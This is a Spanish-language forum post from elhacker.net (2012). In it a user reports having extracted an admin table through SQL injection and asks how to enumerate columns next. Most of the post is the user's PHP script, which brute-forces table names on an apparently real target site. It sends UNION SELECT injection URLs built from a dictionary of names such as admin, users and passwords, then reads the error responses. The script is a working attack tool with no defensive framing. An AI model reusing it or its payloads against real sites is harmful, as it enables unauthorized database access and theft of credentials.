elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Nivel Web / Re: (DUDA) Haciendo SQL Injection. en: 27 Marzo 2012, 19:26 pm
Ya pude obtener la tabla de admin con un codigo SQL para php que hice, ahora los campos lo tengo que hacer de la misma manera??? con algun diccionari ode campos y probando campo por campo? a continuacion les dejo el codigo que hice...


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Untitled Document</title>
</head>

<body>
<?
$pagina="http://www.susitio.com/consejos_detalle.php?advice_id=-2%20UNION/*!%20SELECT*/%201,version%28%29,3,4,5,6,7,8,9,10%20from%20users##";
$tablas=array("admin","tblUsers","tbl_users","tbl_admin","tblAdmin","user","users","username","usernames","usuario","name","names","nombre","nombres","usuarios","member","members","admin_table","miembro","miembros","membername","admins","administrator","administrators","passwd","password","passwords","pass","Pass","user_password","usua_login","user_passwords","user_name","user_names","member_password","mods","mod","moderators","moderator","user_email","user_emails","user_mail","user_mails","mail","emails","email","address","e-mail","emailaddress","correo","correos","phpbb_users","log","logins","login","registers","register","usr","usrs","banners");
echo "Leidas: " .count($tablas) ." palabras<br>";

/*$contenido = file($pagina);

$fp = fopen($contenido,"r") or die("OPEN");
echo $fp;*/
echo "<table><tr><td>Tabla</td><td>Resultado</td></tr>";
for($x=0;$x<count($tablas);$x++){
$pagina="http://www.susitio.com/consejos_detalle.php?advice_id=-2%20UNION/*!%20SELECT*/%201,9999,3,4,5,6,7,8,9,10%20from%20".$tablas[$x]."##";
      $fp = fopen($pagina, 'r');
        $content = '';
        while ($l = fread($fp, 1024)) $content .= $l;
        fclose($fp);
      $encuentra = strpos($content, "doesn't exist");
      if($encuentra)
      echo "<tr><td>".$tablas[$x]."</td><td>NO</td></tr>";
      else
      echo "<tr><td>".$tablas[$x]."</td><td><a href='sacacampos.php?pagina=".$pagina."'>SI</td></tr>";
      
      
}

      
?>
</body>
</html>


Saludos!
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines